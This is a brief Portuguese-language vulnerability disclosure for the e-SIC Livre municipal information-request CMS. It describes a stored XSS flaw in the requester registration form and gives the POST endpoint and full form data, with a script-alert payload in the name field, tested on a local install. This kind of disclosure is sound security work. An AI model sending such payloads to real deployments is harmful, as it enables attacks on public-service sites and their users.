E-Sic Software livre CMS - XSS

Cross site scripting

Postado por @elber333 - 10/10/2017 - FireShell Security team
fireshellsecurity.team - MAIL: admin@fireshellsecurity.team

TODOS OS TESTES FORAM REALIAZADOS EM UM AMBIENTE LOCAL ONDE O CMS FOI HOSPEDADO NA MINHA MÁQUINA.

Sobre o Software:

O e-SIC Livre é uma solução voltada para a gestão de atendimento ao público baseado em perguntas e respostas, e visa oferecer aos municípios um serviço de pleno acordo com a Lei de Acesso à Informação (LAI). Mais transparência e informação direta e clara do governo para com o cidadão. Desenvolvido em PHP/MySQL, é totalmente funcional na maioria dos servidores, e possui módulos como: cadastro de organizações e departamentos, requerimentos com protocolo automático, perguntas frequentes, etc..

Download: https://softwarepublico.gov.br/social/articles/0000/0482/esiclivre.rar

A vulnerabilidade:

    O XSS está presente na área de cadastro de solicitante, onde é possivel injetar códigos pelo input que recebe o nome do usuário. Url: http://localhost/esic/index/

    POST: http://localhost/cadastro/index.php

    DATA: tipopessoa=F&nome=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&
    cpfcnpj=CPFAQUI&idfaixaetaria=&idescolaridade=&profissao=&
    idtipotelefone=&dddtelefone=&telefone=&email=aaaaa%40gmail.com&
    confirmeemail=aaaaa%40gmail.com&idlogradouro=&cep=&logradouro=&bairro=&cidade=&
    uf=&numero=&complemento=&acao=Salvar

Contato: